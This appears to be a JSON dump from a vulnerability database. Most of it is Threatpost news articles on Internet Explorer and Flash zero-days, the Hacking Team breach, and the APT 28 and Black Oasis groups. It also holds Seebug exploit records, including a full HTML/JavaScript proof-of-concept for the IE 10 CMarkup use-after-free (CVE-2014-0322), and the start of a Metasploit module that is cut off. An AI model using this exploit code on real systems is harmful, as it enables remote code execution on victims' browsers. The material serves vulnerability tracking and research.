"IE Zero Day Exploits Increase Just Before Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:36", "bulletinFamily": "info", "description": "Adobe tomorrow is expected to release an updated version of Flash Player that will patch a zero-day vulnerability uncovered among the 400 GB of data stolen from Hacking Team.\n\nThe controversial Italian intrusion and surveillance software vendor was breached and on Sunday, private documents, including internal emails and customer invoices, were leaked. The published loot shows sales to oppressive governments, a practice the company\u2019s marketing material says it did not engage in.\n\nAdobe\u2019s [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>), published a short time ago, is short on details other than to say that the vulnerability has likely been publicly exploited. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d said the Adobe advisory. The vulnerability was reported to Adobe by researcher Morgan Marquis-Boire and Google Project Zero. Marquis-Boire and Adobe confirmed to Threatpost that the patch will address the Hacking Team zero day.\n\nAs researchers comb through the hacked documents and data, there are likely to be other unreported flaws in popular software. The Grugq, a security researcher based in Bangkok, said on his Twitter feed that a Windows zero-day is also documented.\n\n> All that fear about 0day and HackingTeam had only 2 that are relevant (flash + win32k).\n> \n> \u2014 the grugq (@thegrugq) [July 7, 2015](<https://twitter.com/thegrugq/status/618293343819165696>)\n\nHacking Team plays in a market heavily scrutinized by security and privacy experts who say that oppressive governments such as Sudan and Ethiopia\u2014both Hacking Team customers\u2014can abuse the software to keep tabs on citizens and suppress the work of activists, journalists and others. Citizen Lab at the University of Toronto published an open [letter](<https://citizenlab.org/2015/03/open-letter-hacking-team-march-2015/>) earlier this year to Hacking Team executives asking why Ethiopian journalists were targeted by one of their customers, a supposed violation of the Milan-based company\u2019s policy.\n\nSince the Hacking Team breach was disclosed on Sunday afternoon, the story has moved quickly as more details are disclosed about customers and internal operations; the highest revenue-producing countries for Hacking Team are Mexico, Italy and Morocco. The U.S. is also listed among its customers, with the Drug Enforcement Agency and FBI buying spyware from the firm.\n\nIt was also disclosed that Hacking Team had an [enterprise developer certificate from Apple](<https://threatpost.com/hacking-team-couldnt-hack-your-iphone/113636>), allowing it to build sign OS X and iOS applications and distribute them internally. Apple has since revoked Hacking Team\u2019s certificate.\n\nThe EU Parliament, meanwhile, today asked the European Commission whether Hacking Team\u2019s sales to certain countries is a [violation of EU sanctions](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>). Marietje Schaake, a Dutch member of the European Union Parliament, has been outspoken about the use of surveillance programs by sanctioned nations and likened companies such as Hacking Team to modern-day arms dealers.\n", "modified": "2015-07-07T19:46:59", "published": "2015-07-07T15:46:59", "id": "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "href": "https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658/", "type": "threatpost", "title": "Adobe to Patch Hacking Team Flash Zero Day", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:21", "bulletinFamily": "info", "description": "Microsoft last night released a [Fix-It tool](<http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>) as a temporary mitigation for a zero-day vulnerability in Internet Explorer 10 being exploited by two hacker groups against the Veterans of Foreign Wars in the U.S. as well as a [French aerospace manufacturer](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>).\n\nIE 9 also contains the same use-after free vulnerability enabling remote code execution, but it is not being exploited, Microsoft said. Microsoft has issued Fix-It tools for a number of zero-day vulnerabilities exploited in the wild in lieu of rushing out an out-of-band patch. The company\u2019s next scheduled Patch Tuesday security updates release is March 11, which is likely the earliest an IE update would be released.\n\nMicrosoft has been patching its maligned browser almost monthly for more than a year, including a [cumulative update](<http://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214>) on Feb. 11 that patched 24 vulnerabilities, including one that was publicly disclosed.\n\nResearchers at FireEye reported the Veterans of Foreign Wars attack last week and attributed [Operation SnowMan](<http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) to the same groups behind DeputyDog and Ephemeral Hydra, both of which exploited IE zero-days in watering hole attacks to distribute remote access Trojans in order to spy on targets in government, military, manufacturing and other high value industries.\n\nFireEye found an iframe on VFW.org that used a malicious Flash object to trigger the vulnerability in IE 10. Once on a compromised machine the Flash object downloads the RAT from a command server and executes it. As in the previous attacks, a variant of Gh0stRAT, was used in the SnowMan attacks and connected to some of the same IP addresses. The exploit used in the SnowMan attacks, FireEye said, can bypass memory protection features such as Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) built into Windows.\n\nYesterday, researchers at Seculert reported that a second group of attackers was using the same vulnerability in the Microsoft browser to impersonate the French aerospace firm and compromise visitors to its website and steal credentials. [Reuters](<http://www.reuters.com/article/2014/02/18/us-hacking-snecma-idUSBREA1H1Z320140218>) reported yesterday that the manufacturer was Snecma, an engine manufacturer. The news agency cited a source who said the malware used against Snecma targeted domains belonging to the company.\n\nMicrosoft confirmed FireEye\u2019s finding in a [technical description](<http://technet.microsoft.com/en-us/security/advisory/2934088>) of the vulnerability yesterday:\n\n\u201cTo recap, it uses Javascript to trigger the use-after-free condition and then uses Flash to convert a write primitive into a read/write primitive that enables DEP and ASLR to be bypassed. The primitive conversion happens by redirecting a write based on a freed object\u2019s data (which has now been reallocated by the attacker) to corrupt a size field inside a Flash object. The corrupted size field in the Flash object is used to read and write outside of the object\u2019s boundary, allowing discovery of module addresses in Internet Explorer\u2019s Address Space.\u201d\n\nSeculert CTO Aviv Raff said the second group is likely not affiliated with the Operation SnowMan gang. While exploiting the same vulnerability, the group targeting the French manufacturer used different malware. It drops a backdoor and two executables that steal information from browsing sessions; that data is sent to a command and control server, which is hosted in the U.S. Raff said the malware is signed with a valid certificate belonging to Micro Digital Inc.\n\nThe malware changes the host files on infected machines and adds several secure domains for French aerospace companies. While some pharming campaigns have gone this route, Raff said this campaign has a different goal.\n\n\u201cThe domains that were added to the hosts file by the malware provide remote access to the employees, partners, and 3rd party vendors of a specific multinational aircraft and rocket engine manufacturer,\u201d Raff said. \u201cThe IPs added belong to the real remote access web servers and by adding the records to the hosts file the attackers ensured that there would be no DNS connectivity issues. Whenever the infected machines connect to the remote assets, the attackers are able to steal the sensitive credentials. This is the first time we have seen a malware change a hosts file for a purpose other than fraud perpetuated by pharming or for disabling access to specific websites.\u201d\n", "modified": "2014-02-20T16:48:48", "published": "2014-02-20T11:48:48", "id": "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "href": "https://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383/", "type": "threatpost", "title": "Microsoft Ships IE 10 Zero Day Fix-It Tool", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:15", "bulletinFamily": "info", "description": "Microsoft will patch a lingering zero-day vulnerability in Internet Explorer next Tuesday, one of five bulletins it will release as part of its [March 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-mar>).\n\nThe IE 10 zero-day was disclosed close to a month ago when researchers at FireEye reported on [Operation SnowMan](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), an espionage campaign that compromised the U.S. Veterans of Foreign Wars website. The attackers, experts said, were targeting the computers of active military personnel who visit the site seeking benefits information.\n\nFireEye said a Flash exploit was used via an iFrame to trigger the [use-after-free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) in the browser. Compromised computers were hit with a remote access Trojan that stole data; experts speculate the attackers were hoping to gain steal military secrets from the active service members who use the site as a resource.\n\nIt was soon discovered that a [second and unrelated group of attackers](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) was also exploiting the IE 10 zero day, this time to impersonate a number of French aerospace companies, redirecting legitimate traffic to the hacker-controlled domains.\n\nResearchers at Seculert said malware that changes host files on infected machines in order to add in these malicious domains had previously been the domain of pharming attacks used for fraud.\n\n\u201cThis is the first time we have seen a malware change a host file for a purpose other than fraud perpetuated by pharming or for disabling access to specific websites,\u201d Seculert CTO Aviv Raff said.\n\nMicrosoft had shipped a [Fix-It mitigation for the zero-day](<http://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383>) as a stopgap until a patch was ready. Microsoft said IE 9 also contains the same vulnerability, but it was not being exploited. IE 11 users running the Enhanced Mitigation Experience Toolkit (EMET) were also protected against these attacks.\n\nThe IE update is one of two critical bulletins expected next week. The other is also a remote code execution vulnerability in Windows.\n\nAll five bulletins announced by Microsoft today affect versions of Windows or IE all the way back to Windows XP, which Microsoft will no longer support with security updates as of April 8.\n\n\u201cWindows XP is affected by all five updates and there is really no reason to expect this picture to change: Windows XP will continue to be impacted by the majority of vulnerabilities found in the WIndows ecosystem, but you will not be able to address the issues anymore,\u201d said Qualys CTO Wolfgang Kandek. \u201cYou need a strategy for the XP machines remaining in your infrastructure. We are still seeing significant number of XP machines in our scans.\u201d\n\nThe remaining three bulletins were rated \u201cimportant\u201d by Microsoft and include elevation of privilege vulnerability and security feature bypass issues in Windows and another security feature bypass issue in Silverlight.\n\n\u201cOf the remaining issues, one is an important privilege issue, probably going to be a kernel or kernel driver patch; never something to ignore but less important than a critical/remote issue,\u201d said Ross Barrett, senior manager of security engineering at Rapid 7. \u201cThe other two are the seldom seen \u2018security mechanism bypasses\u2019, probably the same issue being patched in Windows and in Silverlight. We will have to wait and see how exploitable this turns out to be. If it turns out that some of these issues are in the wild and under exploitation, then that will be change the circumstances of what to prioritize.\u201d\n\nSilverlight, meanwhile, has relatively limited adoption and given Microsoft\u2019s support of Flash in IE 11, it\u2019s not out of the question it will be discontinued eventually, said Tyler Reguly, manager of security research at Tripwire.\n\n\u201cIn a world filled with so many web technologies, vendors could better serve the public by simply limiting choice and removing dead weight,\u201d Reguly said.\n", "modified": "2014-03-06T19:44:16", "published": "2014-03-06T14:44:16", "id": "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "href": "https://threatpost.com/microsoft-to-patch-ie-10-zero-day-on-patch-tuesday/104653/", "type": "threatpost", "title": "Microsoft to Patch IE 10 Zero Day March 2014 Patch Tuesday", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "bulletinFamily": "info", "description": "An APT group thought to be tied to Russia is flying against conventional wisdom, having as recently as the last three weeks dropped its sixth zero-day in the past four months.\n\nGiven the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nNonetheless, [APT 28](<https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049>), also known by other nicknames such as Tsar Team, Operation Pawn Storm, and Sednit, has been a busy gang targeting government agencies and military operations with a host of Adobe Flash, Microsoft and Java-based zero-days at their disposal.\n\nThis week alone, two zero-days attributed to this team disappeared when they were [patched by Microsoft](<https://threatpost.com/microsoft-patches-hacking-team-windows-kernel-zero-day/113788>) and Oracle in Office and Java respectively. Researchers at [iSight Partners](<http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-leveraged-by-tsar-team/>) reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in [MS15-070](<https://technet.microsoft.com/en-us/library/security/MS15-070>), an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, [Oracle erased a Java zero-day](<https://threatpost.com/oracle-patches-java-zero-day/113792>) in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said.\n\nAPT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight.\n\n\u201cThis indicates it\u2019s not a handful of guys; this is an organization managing this stuff,\u201d Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. \u201cIt\u2019s hard to manage that much infrastructure that they own.\u201d\n\nFive of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach.\n\n\u201cThey actually rewrote it, which is interesting. It\u2019s not just a copy of the [Hacking Team] proof of concept with their own shell code added,\u201d Bartholomew said.\n\nThe Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal.\n\n\u201cIt\u2019s a heap corruption vulnerability in Office where it\u2019s mishandling an object in memory, which allowed for remote code execution from the weaponized document,\u201d Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia.\n\nThe payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests.\n\nThe group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents\u2019 activities.\n\nDespite the fact that this particular Office\u2014and Java\u2014zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal.\n\n\u201cThis throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,\u201d Bartholomew said. \u201cIt\u2019s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.\u201d\n", "modified": "2015-07-21T20:45:15", "published": "2015-07-16T13:46:02", "id": "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "href": "https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/", "type": "threatpost", "title": "Office, Java Patches Erase Latest APT 28 Zero Days", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "bulletinFamily": "info", "description": "Adobe has put the two outstanding [Hacking Team Flash Player zero-day vulnerabilities](<https://threatpost.com/hacking-team-promises-to-rebuild-controversial-surveillance-software/113743>) in check.\n\nToday, Adobe released an [updated Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-18.html>) that patches CVE-2015-5122 and CVE-2015-5123, two use-after-free bugs uncovered and exploited by the controversial Italian surveillance software vendor. The bugs were found as researchers combed through the 400 Gb of data stolen from Hacking Team and posted online July 5.\n\nSince the disclosures, three Flash zero days and an unpatched, publicly exploited Windows kernel privilege escalation vulnerability have been emerged from the Hacking Team cache. Adobe has already [patched the first Flash zero day](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>), CVE-2015-5119, and it is unknown whether Microsoft will today patch the Windows 0day as part of its monthly Patch Tuesday security bulletins.\n\nThe Adobe patches come less than 24 hours after browser vendor Mozilla announced that it had [disabled Flash by default in Firefox](<https://threatpost.com/mozilla-disables-flash-in-firefox/113763>). Prominent security figures, such as new Facebook CSO Alex Stamos, have been vocal about Adobe killing off Flash entirely. Flash has long been a favorite target of criminal and nation-state hackers for its cross-platform ubiquity, and constant spate of security vulnerabilities.\n\n[CVE-2015-5122](<http://www.kb.cert.org/vuls/id/338736>), disclosed to Adobe by FireEye, is an [ActionScript 3 opaqueBackground use-after-free bug](<https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html>), while [CVE-2015-5123](<http://www.kb.cert.org/vuls/id/918568>) is a BitmapData use-after free bug. According to the DHS CERT, both bugs can be exploited by an attacker tricking a visitor into landing on a website hosting an exploit, and allow for complete takeover of a compromised machine\n\nExploit kit expert and security researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html>) said the zero day discovered by FireEye has already been integrated into the Angler Exploit Kit, as well as the Metasploit Framework. The first zero-day uncovered in the hack was also quickly [incorporated into popular exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>).\n\nToday\u2019s Flash update, 18.0.0.209, patches versions 18.0.0.203 and earlier for Windows and Macintosh systems, and 18.0.0.204 and earlier for Linux machines.\n\nThe Hacking Team hack was disclosed on July 5 when seemingly all of the company\u2019s internal email, product specs and sales data was posted at numerous sites. Despite company policy stating the contrary, invoices and sales receipts found in the post-breach data dump show that Hacking Team sold its Remote Control System (RCS) tool to sanctioned countries run by oppressive governments, such as Sudan and Ethiopia. Hacking Team said it has ended its business relationships with these countries. RCS is sold to law enforcements and government agencies worldwide as a monitoring tool.\n\nYesterday, Hacking Team renewed its vow to press on as a company and rebuild not only its infrastructure, but RCS from scratch.\n\n\u201cA totally new internal infrastructure is being [built] at this moment to keep our data safe. Of course, our top priority here has been to develop an update to allow our clients to quickly secure their current surveillance infrastructure,\u201d said Hacking Team chief operating officer David Vincenzetti in a statement. \u201cWe expect to deliver this update immediately. This update will secure once again the \u2018Galileo\u2019 version of Remote Control System.\u201d\n\nAdobe today also patched [46 vulnerabilities in Adobe Reader and Acrobat](<https://helpx.adobe.com/security/products/acrobat/apsb15-15.html>), and [two in the Shockwave Player](<https://helpx.adobe.com/security/products/shockwave/apsb15-17.html>).\n\nThe Reader and Acrobat updates patch a number of code execution vulnerabilities, in addition to information disclosure, denial-of-service, and privilege escalation vulnerabilities in versions 11.0.11 and 10.1.14 and earlier for Windows and Macintosh machines.\n\nThe Shockwave update addresses two memory corruption bugs that lead to code execution in versions 12.1.8.158 and earlier, Adobe said.\n", "modified": "2015-07-15T14:15:04", "published": "2015-07-14T11:47:14", "id": "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "href": "https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/", "type": "threatpost", "title": "Adobe Patches Hacking Team Zero Days in Flash", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:23", "bulletinFamily": "info", "description": "Adobe today released an [out-of-band Flash Player update](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) addressing a zero-day vulnerability being exploited by a little-known Middle Eastern APT group.\n\nThe group known as Black Oasis was, as recently as this month, using exploits for the flaw to drop FinSpy as a payload. Sold by the controversial German company Gamma International, FinSpy, or FinFisher, is a suite of surveillance and espionage software used to remotely monitor compromised computers. It\u2019s sold to governments and law enforcement around the world, including allegations of sales to oppressive regimes including Egypt, Bahrain, Ethiopia, Uganda and elsewhere.\n\nThe vulnerability, CVE-2017-11292, was privately disclosed Oct. 10 by researchers at Kaspersky Lab, who saw the payload and exploit used against a customer\u2019s network. The attackers spread the exploit via email, embedding the Flash exploit inside an Active X object inside a Word document. Brian Bartholomew, a member of Kaspersky Lab\u2019s Global Research and Analysis Team (GReAT), said retrieval of the payload\u2014which is the latest FinSpy version\u2014is done in multiple stages.\n\nAdobe said Flash version 27.0.0.159 on the desktop, Linux and Google Chrome is affected, as well as version 27.0.0.130 for Edge and Internet Explorer 11 on Windows 10 and 8.1. Users should be sure to be running Flash 27.0.0.170 on all platforms, or heed the advice of many security experts to disable Flash all together. [Flash has been designated for end-of-life](<https://threatpost.com/flashs-final-countdown-has-begun/127475/>).\n\nKaspersky Lab published a [report](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) today about the zero day on Securelist.com.\n\nBlack Oasis is a bit of an enigma among APT groups. The group has been on Kaspersky Lab\u2019s radar for nearly a year, Bartholomew said, and has had at least five zero-day vulnerabilities and exploits at its disposal since 2015, all of which have been disclosed and patched. There is only one known victim of the Flash zero day patched today, he said.\n\n\u201cThese guys are definitely customers of Gamma. They\u2019ve been using FinSpy for maybe the last two years,\u201d Bartholomew said. \u201cThey were also potentially customers of Hacking Team.\u201d\n\nBlack Oasis appears to have made use of a Hacking Team zero day, [CVE-2015-5119](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>), prior to the Italian software company being hacked in the summer of 2015 and having many of its attacks publicly dumped online.\n\n\u201cWe know this group was also using that exploit, which we assume was unique to Hacking Team customers,\u201d Bartholomew said. \u201cThey had access to it prior to the hack. Once the hack happened, I have not seen them using Hacking Team at all but they have been using FinSpy pretty regularly since.\u201d\n\nThe APT group\u2019s targets are government and military organizations in the Middle East, countries in North Africa, as well as some in Russia, Ukraine and elsewhere in Europe.\n\n\u201cFinSpy seems to be their payload of choice,\u201d Bartholomew said.\n\nThis is the second zero-day vulnerability in possession of Black Oasis to be patched in the last month. In September, [FireEye disclosed](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) CVE-2017-8759, which was patched by Microsoft and used to spy on an unnamed Russian individual. The vulnerability was described as a SOAP WSDL parser code injection bug spread via Microsoft Office RTF documents. The code injection was used to download and execute script that included PowerShell commands.\n\n\u201cIn the last two months, they\u2019ve burnt two zero days. It\u2019s very evident they have access to a wide swathe of zero days,\u201d Bartholomew said.\n\nZero days can sell for six or seven figures on gray or black markets. They are a source of constant debate between security and privacy experts and governments who buy these attacks for exclusive use as lawful intercept tools in the name of national security or law enforcement purposes.\n\nWhile Black Oasis may be very well resourced, its operational security may be lacking. For example, the group re-used command and control servers burned by the FireEye disclosure in this recent round of attacks using the Flash zero day.\n\n\u201cThey had right around a month to move their infrastructure, but yet they didn\u2019t,\u201d Bartholomew said.\n\nThe emergency update comes less than a week after Patch Tuesday when for the first time in recent memory, Adobe did not publish any security updates for any of its products.\n", "modified": "2017-10-16T11:46:13", "published": "2017-10-16T11:46:13", "id": "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "href": "https://threatpost.com/adobe-patches-flash-zero-day-exploited-by-black-oasis-apt/128467/", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Exploited by Black Oasis APT", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:35:26", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61771", "id": "SSV:61771", "type": "seebug", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0322)", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:01:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86119", "id": "SSV:86119", "title": "MS14-012 Internet Explorer CMarkup Use-After-Free", "type": "seebug", "sourceData": "\n &#60;!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31 \r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n\r\n Generation:\r\n \tc:\\mxmlc\\bin&#62;mxmlc.exe AsXploit.as -o AsXploit.swf\r\n\r\n Exploit-DB mirror: http://www.exploit-db.com/sploits/32851-AsXploit.as\r\n\r\n--&#62;\r\n\r\n&#60;html&#62;\r\n&#60;head&#62;\r\n&#60;/head&#62;\r\n&#60;body&#62;\r\n\r\n&#60;script&#62;\r\n\r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n\r\nfunction dword2data(dword)\r\n{\r\n\tvar d = Number(dword).toString(16);\r\n\twhile (d.length &#60; 8)\r\n\t\td = &#39;0&#39; + d;\r\n\r\n\treturn unescape(&#39;%u&#39; + d.substr(4, 8) + &#39;%u&#39; + d.substr(0, 4));\r\n}\r\n\r\nfunction eXpl()\r\n{\r\n var a=0;\r\n\r\n for (a=0; a &#60; arrLen; a++) {\r\n g_arr[a] = document.createElement(&#39;div&#39;);\r\n }\r\n\t\r\n\t// Build a new object\r\n\tvar b = dword2data(0x19fffff3);\r\n while (b.length &#60; 0x360)\r\n\t{\r\n\t\t// mov eax,dword ptr [esi+98h]\r\n\t\t// ...\r\n\t\t// mov eax,dword ptr [eax+8]\r\n\t\t// and dword ptr [eax+2F0h],0FFFFFFBFh\r\n\t\tif (b.length == (0x98 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a000010);\r\n\t\t}\r\n\t\t// mov ecx,dword ptr [edx+94h]\r\n\t\t// mov eax,dword ptr [ecx+0Ch]\r\n\t\telse if (b.length == (0x94 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a111111);\r\n\t\t}\r\n\t\t// mov eax,dword ptr [edx+15Ch]\r\n\t\t// mov ecx,dword ptr [eax+edx*8]\r\n\t\telse if (b.length == (0x15c / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x42424242);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tb += dword2data(0x19fffff3);\r\n\t\t}\r\n\t}\r\n \r\n\tvar d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n\t// trigger\r\n\ttry{\r\n this.outerHTML=this.outerHTML\r\n } \r\n\tcatch(e){\r\n\t\t\r\n\t}\r\n\t\r\n CollectGarbage();\r\n\r\n\t// Replace freed object\r\n for (a=0; a &#60; arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n\r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName(&#34;script&#34;);\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement(&#39;SELECT&#39;);\r\n c = b.appendChild(c);\r\n}\r\n\r\n\r\n\r\n&#60;/script&#62;\r\n&#60;embed src=AsXploit.swf width=&#34;10&#34; height=&#34;10&#34;&#62;&#60;/embed&#62;\r\n&#60;/body&#62;\r\n&#60;/html&#62;\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86119"}, {"lastseen": "2017-11-19T17:37:13", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65551\r\nCVE(CAN) ID: CVE-2014-0322\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nMicrosoft Internet Explorer 10\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u5229\u7528\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4fee\u6539\u4efb\u610f\u5730\u5740\u5904\u7684\u5185\u5b58\u5b57\u8282\uff0c\u7ed3\u5408Flash ActionScript\u83b7\u53d6\u5185\u5b58\u8bfb\u5199\u6743\u9650\uff0c\u8bfb\u51faactionscript\u4e2d\u5bf9\u8c61\u7684\u865a\u8868\u6307\u9488\uff0c\u4ece\u800c\u7ed5\u8fc7ASLR\uff1b\u7136\u540e\u4f7f\u7528ROOP\u6280\u672f\u7ed5\u8fc7DEP\u3002\r\n0\r\nMicrosoft Internet Explorer 10\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5b89\u88c5EMET\u6216\u5347\u7ea7\u5230IE 11\u4ee5\u9632\u6076\u610f\u5229\u7528\u6b64\u6f0f\u6d1e\u3002", "modified": "2014-02-17T00:00:00", "published": "2014-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61455", "id": "SSV:61455", "type": "seebug", "title": "Microsoft Internet Explorer\u91ca\u653e\u540e\u91cd\u7528\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:51:51", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86169", "id": "SSV:86169", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "type": "seebug", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include 